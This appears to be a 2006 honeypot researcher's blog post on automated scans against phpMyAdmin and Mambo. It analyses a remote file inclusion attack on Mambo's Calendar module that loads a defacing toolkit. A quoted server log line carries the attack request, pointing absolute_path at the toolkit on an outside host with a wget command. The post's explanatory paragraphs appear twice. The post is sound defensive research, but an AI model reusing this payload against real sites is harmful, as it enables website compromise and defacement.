Defacing Tool 2.0 by r3v3ng4ns
Thursday, August 31. 2006
Besides the compromises of the high-interaction honeypots, we see also quite a few automated attacks. In particular, I see quite a few scanning attempts for vulnerable web applications - phpMyAdmin and Mambo is clearly dominating. The Mambo attacks look like the following:
This is related to a vulnerability in the Calendar module of Mambo <= 1.5.7 which leads to the possibility of remote file inclusion, as seen in the request (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same as previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and the configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).
I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).
[Sun Aug 27 14:58:59 2006] [error] [client 195.86.124.210] File does not exist:
/XXX/htdocs/components, referer: http://XXX.128.12.35/components/com_calendar.php?
absolute_path=http://www.freewebtown.com/england90/tool25.gif?&cmd=wget
This is related to a vulnerability in the Calendar module of Mambo <= 1.5.7 which leads to the possibility of remote file inclusion, as seen in the request (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same as previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and the configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).
I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).
".
